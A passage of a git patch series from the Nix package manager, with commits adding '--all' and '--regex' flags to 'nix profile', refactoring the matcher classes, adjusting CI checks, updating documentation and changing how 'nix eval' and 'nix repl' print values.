-  # nix profile upgrade --regex '.*'
+  # nix profile upgrade --all
   ```
 
 * Upgrade a specific package by name:
@@ -15,6 +15,12 @@ R""(
   # nix profile upgrade hello
   ```
 
+* Upgrade all packages that include 'vim' in their name:
+
+  ```console
+  # nix profile upgrade --regex '.*vim.*'
+  ```
+
 # Description
 
 This command upgrades a previously installed package in a Nix profile,
diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index c08d02e70..701c5cb29 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -458,6 +458,7 @@ enum MatcherType
     Regex,
     StorePath,
     Name,
+    All,
 };
 
 struct Matcher
@@ -500,6 +501,14 @@ Matcher createNameMatcher(const std::string & name) {
     };
 }
 
+Matcher all = {
+    .type = MatcherType::All,
+    .title = "--all",
+    .matches = [](const std::string &name, const ProfileElement & element) {
+        return true;
+    }
+};
+
 class MixProfileElementMatchers : virtual Args, virtual StoreCommand
 {
     std::vector _matchers;
@@ -508,6 +517,13 @@ public:
 
     MixProfileElementMatchers()
     {
+        addFlag({
+            .longName = "all",
+            .description = "Match all packages in the profile.",
+            .handler = {[this]() {
+                _matchers.push_back(all);
+            }},
+        });
         addFlag({
             .longName = "regex",
             .description = "A regular expression to match one or more packages in the profile.",
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 67c8bcc98..b8513ac02 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -77,6 +77,13 @@ nix profile upgrade --regex '.*'
 [[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.1/bin/hello ]]
 nix profile rollback
 
+# Test upgrading all packages
+printf 2.2 > $flake1Dir/version
+nix profile upgrade --all
+[[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.2/bin/hello ]]
+nix profile rollback
+printf 1.0 > $flake1Dir/version
+
 # Test matching no packages using literal package name.
 assertStderr nix --offline profile upgrade this_package_is_not_installed << EOF
 warning: Package name 'this_package_is_not_installed' does not match any packages in the profile.

From 91f068c19309091b85f18fb5fc10ab3644642d50 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 6 Mar 2024 22:46:47 +0100
Subject: [PATCH 593/654] profile: make --all exclusive

---
 src/nix/profile.cc              | 9 +++++++++
 tests/functional/nix-profile.sh | 6 ++++++
 2 files changed, 15 insertions(+)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index 701c5cb29..d9455b4ee 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -554,6 +554,15 @@ public:
             throw UsageError("No packages specified.");
         }
 
+        if (std::find_if(_matchers.begin(), _matchers.end(), [](const Matcher & m) { return m.type == MatcherType::All; }) != _matchers.end() && _matchers.size() > 1) {
+            throw UsageError("--all cannot be used with package names or regular expressions.");
+        }
+
+        if (manifest.elements.empty()) {
+            warn("There are no packages in the profile.");
+            return {};
+        }
+
         std::set result;
         for (auto & matcher : _matchers) {
             bool foundMatch = false;
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index b8513ac02..58fdce411 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -84,6 +84,12 @@ nix profile upgrade --all
 nix profile rollback
 printf 1.0 > $flake1Dir/version
 
+# Test --all exclusivity.
+assertStderr nix --offline profile upgrade --all foo << EOF
+error: --all cannot be used with package names or regular expressions.
+Try 'nix --help' for more information.
+EOF
+
 # Test matching no packages using literal package name.
 assertStderr nix --offline profile upgrade this_package_is_not_installed << EOF
 warning: Package name 'this_package_is_not_installed' does not match any packages in the profile.

From 4741d3e308a716e5637af357237e1f44c7d598b6 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Thu, 7 Mar 2024 00:21:40 +0100
Subject: [PATCH 594/654] add release note

---
 doc/manual/rl-next/profile-regex-all.md | 35 +++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 doc/manual/rl-next/profile-regex-all.md

diff --git a/doc/manual/rl-next/profile-regex-all.md b/doc/manual/rl-next/profile-regex-all.md
new file mode 100644
index 000000000..e3e6849cc
--- /dev/null
+++ b/doc/manual/rl-next/profile-regex-all.md
@@ -0,0 +1,35 @@
+---
+synopsis: Introduction of `--regex` and `--all` in `nix profile remove` and `nix profile upgrade`
+prs: 10166
+---
+
+Previously the command-line arguments for `nix profile remove` and `nix profile upgrade` matched the package entries using regular expression.
+For instance:
+
+```
+nix profile remove '.*vim.*'
+```
+
+This would remove all packages that contain `vim` in their name.
+
+In most cases, only singular package names were used to remove and upgrade packages. Mixing this with regular expressions sometimes lead to unintended behavior. For instance, `python3.1` could match `python311`.
+
+To avoid unintended behavior, the arguments are now only matching exact names.
+
+Matching using regular expressions is still possible by using the new `--regex` flag:
+
+```
+nix profile remove --regex '.*vim.*'
+```
+
+One of the most useful cases for using regular expressions was to upgrade all packages. This was previously accomplished by:
+
+```
+nix profile upgrade '.*'
+```
+
+With the introduction of the `--all` flag, this now becomes more straightforward:
+
+```
+nix profile upgrade --all
+```

From 4354b37fc4d83002027af80cce037e2ee89f552c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Fri, 8 Mar 2024 08:48:53 +0100
Subject: [PATCH 595/654] Add more logs to the evalNixpkgs test

Make it possible to understand a mimimum what's going on in case of a
failure
---
 flake.nix | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/flake.nix b/flake.nix
index 42aaace67..80a55d40d 100644
--- a/flake.nix
+++ b/flake.nix
@@ -299,8 +299,11 @@
               ''
                 type -p nix-env
                 # Note: we're filtering out nixos-install-tools because https://github.com/NixOS/nixpkgs/pull/153594#issuecomment-1020530593.
-                time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
-                [[ $(sha1sum < packages | cut -c1-40) = ff451c521e61e4fe72bdbe2d0ca5d1809affa733 ]]
+                (
+                  set -x
+                  time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
+                  [[ $(sha1sum < packages | cut -c1-40) = ff451c521e61e4fe72bdbe2d0ca5d1809affa733 ]]
+                )
                 mkdir $out
               '';
 

From 201369dceb49da19af42e29b1dc11586da4a26e3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Fri, 8 Mar 2024 08:50:27 +0100
Subject: [PATCH 596/654] tests.evalNixpkgs: Update the golden hash

`nix-env -qaP`'s output has changed a bit because of https://github.com/NixOS/nix/issues/10132.

Although that's a bit annoying, it isn't nearly as problematic as the
evaluation changes that this test is supposed to catch. So it's find to
just update the hash for the time being and fix the issue later
(properly fixing the issue will very likely change the hash any way).
---
 flake.nix | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/flake.nix b/flake.nix
index 80a55d40d..e9d8395ec 100644
--- a/flake.nix
+++ b/flake.nix
@@ -302,7 +302,7 @@
                 (
                   set -x
                   time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
-                  [[ $(sha1sum < packages | cut -c1-40) = ff451c521e61e4fe72bdbe2d0ca5d1809affa733 ]]
+                  [[ $(sha1sum < packages | cut -c1-40) = e01b031fc9785a572a38be6bc473957e3b6faad7 ]]
                 )
                 mkdir $out
               '';

From 520a1df208e8292ce0dcb8cb12f454413ff88b0e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 10:40:53 +0100
Subject: [PATCH 597/654] flake: Disable the perl bindings on i686-linux

Some perl dependencies are failing: https://hydra.nixos.org/build/252347639/nixlog/1

Since the support is only best-effort there, disable the perl bindings
---
 flake.nix | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/flake.nix b/flake.nix
index 42aaace67..15100f772 100644
--- a/flake.nix
+++ b/flake.nix
@@ -341,7 +341,6 @@
 
       checks = forAllSystems (system: {
         binaryTarball = self.hydraJobs.binaryTarball.${system};
-        perlBindings = self.hydraJobs.perlBindings.${system};
         installTests = self.hydraJobs.installTests.${system};
         nixpkgsLibTests = self.hydraJobs.tests.nixpkgsLibTests.${system};
         rl-next =
@@ -351,6 +350,11 @@
         '';
       } // (lib.optionalAttrs (builtins.elem system linux64BitSystems)) {
         dockerImage = self.hydraJobs.dockerImage.${system};
+      } // (lib.optionalAttrs (!(builtins.elem system linux32BitSystems))) {
+        # Some perl dependencies are broken on i686-linux.
+        # Since the support is only best-effort there, disable the perl
+        # bindings
+        perlBindings = self.hydraJobs.perlBindings.${system};
       });
 
       packages = forAllSystems (system: rec {

From ff74c081e9996756107a7a6a718376acac1aaa17 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 10:31:51 +0100
Subject: [PATCH 598/654] flake: Remove the cross-compilation to freebsd13

`libc` is broken there: https://hydra.nixos.org/build/252347598.

We can reintroduce it once the base system is working
---
 flake.nix | 1 -
 1 file changed, 1 deletion(-)

diff --git a/flake.nix b/flake.nix
index 42aaace67..49474b27e 100644
--- a/flake.nix
+++ b/flake.nix
@@ -31,7 +31,6 @@
       crossSystems = [
         "armv6l-unknown-linux-gnueabihf"
         "armv7l-unknown-linux-gnueabihf"
-        "x86_64-unknown-freebsd13"
         "x86_64-unknown-netbsd"
       ];
 

From 3d628d17041bbaab745dd04bedb2cea21c1f11a5 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Thu, 7 Mar 2024 21:40:18 +0100
Subject: [PATCH 599/654] profile: convert Matcher to abstract class

---
 src/nix/profile.cc | 122 ++++++++++++++++++++++++++-------------------
 1 file changed, 71 insertions(+), 51 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d9455b4ee..75f22934f 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -453,65 +453,85 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
     }
 };
 
-enum MatcherType
-{
-    Regex,
-    StorePath,
-    Name,
-    All,
-};
-
 struct Matcher
 {
-    MatcherType type;
-    std::string title;
-    std::function matches;
+    virtual std::string getTitle() = 0;
+    virtual bool matches(const std::string & name, const ProfileElement & element) = 0;
 };
 
-Matcher createRegexMatcher(const std::string & pattern)
+struct RegexMatcher : public Matcher
 {
-    std::regex reg(pattern, std::regex::extended | std::regex::icase);
-    return {
-        .type = MatcherType::Regex,
-        .title = fmt("Regex '%s'", pattern),
-        .matches = [reg](const std::string &name, const ProfileElement & element) {
-            return std::regex_match(element.identifier(), reg);
-        },
-    };
-}
+    std::regex regex;
+    std::string pattern;
 
-Matcher createStorePathMatcher(const nix::StorePath & storePath)
+    RegexMatcher(const std::string & pattern) : regex(pattern, std::regex::extended | std::regex::icase), pattern(pattern)
+    { }
+
+    std::string getTitle() override
+    {
+        return fmt("Regex '%s'", pattern);
+    }
+
+    bool matches(const std::string & name, const ProfileElement & element) override
+    {
+        return std::regex_match(element.identifier(), regex);
+    }
+};
+
+struct StorePathMatcher : public Matcher
 {
-    return {
-        .type = MatcherType::StorePath,
-        .title = fmt("Store path '%s'", storePath.to_string()),
-        .matches = [storePath](const std::string &name, const ProfileElement & element) {
-            return element.storePaths.count(storePath);
-        }
-    };
-}
+    nix::StorePath storePath;
 
-Matcher createNameMatcher(const std::string & name) {
-    return {
-        .type = MatcherType::Name,
-        .title = fmt("Package name '%s'", name),
-        .matches = [name](const std::string &elementName, const ProfileElement & element) {
-            return elementName == name;
-        }
-    };
-}
+    StorePathMatcher(const nix::StorePath & storePath) : storePath(storePath)
+    { }
 
-Matcher all = {
-    .type = MatcherType::All,
-    .title = "--all",
-    .matches = [](const std::string &name, const ProfileElement & element) {
+    std::string getTitle() override
+    {
+        return fmt("Store path '%s'", storePath.to_string());
+    }
+
+    bool matches(const std::string & name, const ProfileElement & element) override
+    {
+        return element.storePaths.count(storePath);
+    }
+};
+
+struct NameMatcher : public Matcher
+{
+    std::string name;
+
+    NameMatcher(const std::string & name) : name(name)
+    { }
+
+    std::string getTitle() override
+    {
+        return fmt("Package name '%s'", name);
+    }
+
+    bool matches(const std::string & name, const ProfileElement & element) override
+    {
+        return name == this->name;
+    }
+};
+
+struct AllMatcher : public Matcher
+{
+    std::string getTitle() override
+    {
+        return "--all";
+    }
+
+    bool matches(const std::string & name, const ProfileElement & element) override
+    {
         return true;
     }
 };
 
+AllMatcher all;
+
 class MixProfileElementMatchers : virtual Args, virtual StoreCommand
 {
-    std::vector _matchers;
+    std::vector> _matchers;
 
 public:
 
@@ -521,7 +541,7 @@ public:
             .longName = "all",
             .description = "Match all packages in the profile.",
             .handler = {[this]() {
-                _matchers.push_back(all);
+                _matchers.push_back(ref(std::shared_ptr(&all, [](AllMatcher*) {})));
             }},
         });
         addFlag({
@@ -529,7 +549,7 @@ public:
             .description = "A regular expression to match one or more packages in the profile.",
             .labels = {"pattern"},
             .handler = {[this](std::string arg) {
-                _matchers.push_back(createRegexMatcher(arg));
+                _matchers.push_back(make_ref(arg));
             }},
         });
         expectArgs({
@@ -540,9 +560,9 @@ public:
                     if (auto n = string2Int(arg)) {
                         throw Error("'nix profile' no longer supports indices ('%d')", *n);
                     } else if (getStore()->isStorePath(arg)) {
-                        _matchers.push_back(createStorePathMatcher(getStore()->parseStorePath(arg)));
+                        _matchers.push_back(make_ref(getStore()->parseStorePath(arg)));
                     } else {
-                        _matchers.push_back(createNameMatcher(arg));
+                        _matchers.push_back(make_ref(arg));
                     }
                 }
             }}
@@ -554,7 +574,7 @@ public:
             throw UsageError("No packages specified.");
         }
 
-        if (std::find_if(_matchers.begin(), _matchers.end(), [](const Matcher & m) { return m.type == MatcherType::All; }) != _matchers.end() && _matchers.size() > 1) {
+        if (std::find_if(_matchers.begin(), _matchers.end(), [](const ref & m) { return m.dynamic_pointer_cast(); }) != _matchers.end() && _matchers.size() > 1) {
             throw UsageError("--all cannot be used with package names or regular expressions.");
         }
 
@@ -567,13 +587,13 @@ public:
         for (auto & matcher : _matchers) {
             bool foundMatch = false;
             for (auto & [name, element] : manifest.elements) {
-                if (matcher.matches(name, element)) {
+                if (matcher->matches(name, element)) {
                     result.insert(name);
                     foundMatch = true;
                 }
             }
             if (!foundMatch) {
-                warn("%s does not match any packages in the profile.", matcher.title);
+                warn("%s does not match any packages in the profile.", matcher->getTitle());
             }
         }
         return result;

From 6d245182e8900ad86cf767108289afc879293e8c Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 8 Mar 2024 12:40:14 +0100
Subject: [PATCH 600/654] GitHub fetcher: Don't emit treeHash yet

But do accept it if it's there, so we don't choke on future lock files
that do have the treeHash attribute.
---
 src/libfetchers/github.cc | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index d9d348756..1ca639419 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -111,6 +111,7 @@ struct GitArchiveInputScheme : InputScheme
             "narHash",
             "lastModified",
             "host",
+            "treeHash",
         };
     }
 
@@ -268,7 +269,9 @@ struct GitArchiveInputScheme : InputScheme
     {
         auto [input, tarballInfo] = downloadArchive(store, _input);
 
+        #if 0
         input.attrs.insert_or_assign("treeHash", tarballInfo.treeHash.gitRev());
+        #endif
         input.attrs.insert_or_assign("lastModified", uint64_t(tarballInfo.lastModified));
 
         auto accessor = getTarballCache()->getAccessor(tarballInfo.treeHash, false);

From 1ffcbddf62824475257da2e58b2047e87f5287c8 Mon Sep 17 00:00:00 2001
From: Jonathan Dickinson 
Date: Fri, 8 Mar 2024 09:24:44 -0500
Subject: [PATCH 601/654] docs: add inherit to language overview (#10194)

* docs: add inherit to language overview

Adds a short summary about `inherit` to the language overview.
---
 doc/manual/src/language/index.md | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)

diff --git a/doc/manual/src/language/index.md b/doc/manual/src/language/index.md
index a26e43a05..5388c6dc4 100644
--- a/doc/manual/src/language/index.md
+++ b/doc/manual/src/language/index.md
@@ -432,6 +432,32 @@ This is an incomplete overview of language features, by example.
 
   
  
+ 
+  
+
+   `inherit pkgs src;`
+
+  
+  
+
+   Adds the variables to the current scope (attribute set or `let` binding).
+   Desugars to `pkgs = pkgs; src = src;`
+
+  
+ 
+ 
+  
+
+   `inherit (pkgs) lib stdenv;`
+
+  
+  
+
+   Adds the attributes, from the attribute set in parentheses, to the current scope (attribute set or `let` binding).
+   Desugars to `lib = pkgs.lib; stdenv = pkgs.stdenv;`
+
+  
+ 
  
   
 

From 35f2b07668f1ef7e62d16fe702278ad3115c22dd Mon Sep 17 00:00:00 2001
From: Felix Uhl 
Date: Fri, 8 Mar 2024 20:03:31 +0100
Subject: [PATCH 602/654] docs: Fix link to release note documentation

---
 CONTRIBUTING.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index a0c2b16f4..887bd4802 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -67,7 +67,7 @@ Check out the [security policy](https://github.com/NixOS/nix/security/policy).
    - [ ] API documentation in header files
    - [ ] Code and comments are self-explanatory
    - [ ] Commit message explains **why** the change was made
-   - [ ] New feature or incompatible change: updated [release notes](./doc/manual/src/release-notes/rl-next.md)
+   - [ ] New feature or incompatible change: [add a release note](https://nixos.org/manual/nix/stable/contributing/hacking#add-a-release-note)
 
 7. If you need additional feedback or help to getting pull request into shape, ask other contributors using [@mentions](https://docs.github.com/en/get-started/writing-on-github/getting-started-with-writing-and-formatting-on-github/basic-writing-and-formatting-syntax#mentioning-people-and-teams).
 

From 4910d74086a85876e093136a0e8ebc547b467af7 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Fri, 8 Mar 2024 21:43:54 -0800
Subject: [PATCH 603/654] Print derivation paths in `nix eval`

`nix eval` forces values and prints derivations as attribute sets, so
commands that print derivations (e.g. `nix eval nixpkgs#bash`) will
infinitely loop and segfault.

Printing derivations as `.drv` paths makes `nix eval` complete as
expected. Further work is needed, but this is better than a segfault.
---
 src/nix/eval.cc | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/src/nix/eval.cc b/src/nix/eval.cc
index 2044c8c2b..088be3b17 100644
--- a/src/nix/eval.cc
+++ b/src/nix/eval.cc
@@ -120,8 +120,17 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption
         }
 
         else {
-            state->forceValueDeep(*v);
-            logger->cout("%s", ValuePrinter(*state, *v, PrintOptions { .force = true }));
+            logger->cout(
+                "%s",
+                ValuePrinter(
+                    *state,
+                    *v,
+                    PrintOptions {
+                        .force = true,
+                        .derivationPaths = true
+                    }
+                )
+            );
         }
     }
 };

From ac730622e81336f42961cebea0f69bc637127ea4 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Sat, 9 Mar 2024 18:57:57 +0100
Subject: [PATCH 604/654] document where the value of `builtins.nixPath` comes
 from (#9113)

* document default values for `nix-path`

also note how it's overridden and note the effect of `restrict-eval`
---
 src/libexpr/eval-settings.hh | 23 +++++++++++++++++------
 src/libexpr/primops.cc       |  8 +++-----
 2 files changed, 20 insertions(+), 11 deletions(-)

diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh
index b5783d28f..c5581b9ff 100644
--- a/src/libexpr/eval-settings.hh
+++ b/src/libexpr/eval-settings.hh
@@ -21,11 +21,24 @@ struct EvalSettings : Config
     Setting nixPath{
         this, getDefaultNixPath(), "nix-path",
         R"(
-          List of directories to be searched for `<...>` file references
+          List of search paths to use for [lookup path](@docroot@/language/constructs/lookup-path.md) resolution.
+          This setting determines the value of
+          [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath) and can be used with [`builtins.findFile`](@docroot@/language/builtin-constants.md#builtins-findFile).
 
-          In particular, outside of [pure evaluation mode](#conf-pure-eval), this determines the value of
-          [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath).
-        )"};
+          The default value is
+
+          ```
+          $HOME/.nix-defexpr/channels
+          nixpkgs=$NIX_STATE_DIR/profiles/per-user/root/channels/nixpkgs
+          $NIX_STATE_DIR/profiles/per-user/root/channels
+          ```
+
+          It can be overridden with the [`NIX_PATH` environment variable](@docroot@/command-ref/env-common.md#env-NIX_PATH) or the [`-I` command line option](@docroot@/command-ref/opt-common.md#opt-I).
+
+          > **Note**
+          >
+          > If [pure evaluation](#conf-pure-eval) is enabled, `nixPath` evaluates to the empty list `[ ]`.
+        )", {}, false};
 
     Setting currentSystem{
         this, "", "eval-system",
@@ -55,8 +68,6 @@ struct EvalSettings : Config
           [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath),
           or to URIs outside of
           [`allowed-uris`](@docroot@/command-ref/conf-file.md#conf-allowed-uris).
-
-          Also the default value for [`nix-path`](#conf-nix-path) is ignored, such that only explicitly set search path entries are taken into account.
         )"};
 
     Setting pureEval{this, false, "pure-eval",
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index a7687fa06..bc2a70496 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1736,7 +1736,7 @@ static RegisterPrimOp primop_findFile(PrimOp {
       - If the suffix is found inside that directory, then the entry is a match.
         The combined absolute path of the directory (now downloaded if need be) and the suffix is returned.
 
-      [Lookup path](@docroot@/language/constructs/lookup-path.md) expressions can be [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath):
+      [Lookup path](@docroot@/language/constructs/lookup-path.md) expressions are [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath):
 
       ```nix
       
@@ -4570,11 +4570,9 @@ void EvalState::createBaseEnv()
     addConstant("__nixPath", v, {
         .type = nList,
         .doc = R"(
-          List of search path entries used to resolve [lookup paths](@docroot@/language/constructs/lookup-path.md).
+          The value of the [`nix-path` configuration setting](@docroot@/command-ref/conf-file.md#conf-nix-path): a list of search path entries used to resolve [lookup paths](@docroot@/language/constructs/lookup-path.md).
 
-          Lookup path expressions can be
-          [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar)
-          using this and
+          Lookup path expressions are [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and
           [`builtins.findFile`](./builtins.html#builtins-findFile):
 
           ```nix

From ea8faf8e9ada8513fe10afdc1f369e0dc6d4dce5 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sat, 9 Mar 2024 15:57:29 -0800
Subject: [PATCH 605/654] Replace `foo` with `__NIX_STR` in `cxx-big-literal`

Looks a little nicer when you check the generated sources.
---
 mk/cxx-big-literal.mk | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/mk/cxx-big-literal.mk b/mk/cxx-big-literal.mk
index 85365df8e..d64a171c8 100644
--- a/mk/cxx-big-literal.mk
+++ b/mk/cxx-big-literal.mk
@@ -1,5 +1,5 @@
 %.gen.hh: %
-	@echo 'R"foo(' >> $@.tmp
+	@echo 'R"__NIX_STR(' >> $@.tmp
 	$(trace-gen) cat $< >> $@.tmp
-	@echo ')foo"' >> $@.tmp
+	@echo ')__NIX_STR"' >> $@.tmp
 	@mv $@.tmp $@

From 70e93c1e2b36d14dbd06524b73c864e3e93a2710 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sat, 9 Mar 2024 17:07:52 -0800
Subject: [PATCH 606/654] Make `Matcher` subclasses `final`

Fixes this very long warning, which I'll only include the first line of:

/nix/store/8wrjhrycpshhc3b41xmjwvgqr2m3yajq-libcxx-16.0.6-dev/include/c++/v1/__memory/construct_at.h:66:5: warning: destructor called on non-final 'RegexMatcher' that has virtual functions but non-virtual destructor [-Wdelete-non-abstract-non-virtual-dtor]
    __loc->~_Tp();
---
 src/nix/profile.cc | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index b5ffc7cc6..c0f805794 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -485,7 +485,7 @@ struct Matcher
     virtual bool matches(const std::string & name, const ProfileElement & element) = 0;
 };
 
-struct RegexMatcher : public Matcher
+struct RegexMatcher final : public Matcher
 {
     std::regex regex;
     std::string pattern;
@@ -504,7 +504,7 @@ struct RegexMatcher : public Matcher
     }
 };
 
-struct StorePathMatcher : public Matcher
+struct StorePathMatcher final : public Matcher
 {
     nix::StorePath storePath;
 
@@ -522,7 +522,7 @@ struct StorePathMatcher : public Matcher
     }
 };
 
-struct NameMatcher : public Matcher
+struct NameMatcher final : public Matcher
 {
     std::string name;
 
@@ -540,7 +540,7 @@ struct NameMatcher : public Matcher
     }
 };
 
-struct AllMatcher : public Matcher
+struct AllMatcher final : public Matcher
 {
     std::string getTitle() override
     {

From d859d6c4341cfc735e3c373a777ee512f800817a Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sat, 9 Mar 2024 18:13:08 -0800
Subject: [PATCH 607/654] `:print` strings directly in `nix repl`

Strings are now printed directly when evaluated by `:print`, rather than
escaped. This makes it easier to debug multi-line strings or strings
containing quotes, like the results of `builtins.readFile`,
`lib.toShellArg`, and so on.

```
nix-repl> "cuppy\ndog\ncity"
"cuppy\ndog\ncity"

nix-repl> :p "cuppy\ndog\ncity"
cuppy
dog
city
```
---
 src/libcmd/repl.cc | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 75f20d635..1a93a54fe 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -542,6 +542,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
              << "  :l, :load              Load Nix expression and add it to scope\n"
              << "  :lf, :load-flake        Load Nix flake and add it to scope\n"
              << "  :p, :print             Evaluate and print expression recursively\n"
+             << "                               Strings are printed directly, without escaping.\n"
              << "  :q, :quit                    Exit nix-repl\n"
              << "  :r, :reload                  Reload all files\n"
              << "  :sh                    Build dependencies of derivation, then start\n"
@@ -749,7 +750,11 @@ ProcessLineResult NixRepl::processLine(std::string line)
     else if (command == ":p" || command == ":print") {
         Value v;
         evalString(arg, v);
-        printValue(std::cout, v);
+        if (v.type() == nString) {
+            std::cout << v.string_view();
+        } else {
+            printValue(std::cout, v);
+        }
         std::cout << std::endl;
     }
 

From d13c63afa2b7b83de65d353918d4341e9e31e640 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sat, 9 Mar 2024 18:28:04 -0800
Subject: [PATCH 608/654] Print top-level errors normally in `nix repl`
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Previously, errors while printing values in `nix repl` would be printed
in `«error: ...»` brackets rather than displayed normally:

```
nix-repl> legacyPackages.aarch64-darwin.pythonPackages.APScheduler
«error: Package ‘python-2.7.18.7’ in /nix/store/6s0m1qc31zw3l3kq0q4wd5cp3lqpkq0q-source/pkgs/development/interpreters/python/cpython/2.7/default.nix:335 is marked as insecure, refusing to evaluate.»
```

Now, errors will be displayed normally if they're emitted at the
top-level of an expression:

```
nix-repl> legacyPackages.aarch64-darwin.pythonPackages.APScheduler
error:
       … in the condition of the assert statement
         at /nix/store/6s0m1qc31zw3l3kq0q4wd5cp3lqpkq0q-source/lib/customisation.nix:268:17:
          267|     in commonAttrs // {
          268|       drvPath = assert condition; drv.drvPath;
             |                 ^
          269|       outPath = assert condition; drv.outPath;

       … in the left operand of the OR (||) operator
         at /nix/store/6s0m1qc31zw3l3kq0q4wd5cp3lqpkq0q-source/pkgs/development/interpreters/python/passthrufun.nix:28:45:
           27|         if lib.isDerivation value then
           28|           lib.extendDerivation (valid value || throw "${name} should use `buildPythonPackage` or `toPythonModule` if it is to be part of the Python packages set.") {} value
             |                                             ^
           29|         else

       (stack trace truncated; use '--show-trace' to show the full trace)

       error: Package ‘python-2.7.18.7’ in /nix/store/6s0m1qc31zw3l3kq0q4wd5cp3lqpkq0q-source/pkgs/development/interpreters/python/cpython/2.7/default.nix:335 is marked as insecure, refusing to evaluate.
```

Errors emitted in nested structures (like e.g. when printing `nixpkgs`)
will still be printed in brackets.
---
 src/libcmd/repl.cc           |   3 +-
 src/libexpr/print-options.hh |  30 ++++++++-
 src/libexpr/print.cc         | 120 +++++++++++++++++------------------
 3 files changed, 91 insertions(+), 62 deletions(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 75f20d635..fce7b1a73 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -123,7 +123,8 @@ struct NixRepl
             .force = true,
             .derivationPaths = true,
             .maxDepth = maxDepth,
-            .prettyIndent = 2
+            .prettyIndent = 2,
+            .errors = ErrorPrintBehavior::ThrowTopLevel,
         });
     }
 };
diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh
index 6c5e80c61..080ba26b8 100644
--- a/src/libexpr/print-options.hh
+++ b/src/libexpr/print-options.hh
@@ -8,6 +8,29 @@
 
 namespace nix {
 
+/**
+ * How errors should be handled when printing values.
+ */
+enum class ErrorPrintBehavior {
+    /**
+     * Print the first line of the error in brackets: `«error: oh no!»`
+     */
+    Print,
+    /**
+     * Throw the error to the code that attempted to print the value, instead
+     * of suppressing it it.
+     */
+    Throw,
+    /**
+     * Only throw the error if encountered at the top level of the expression.
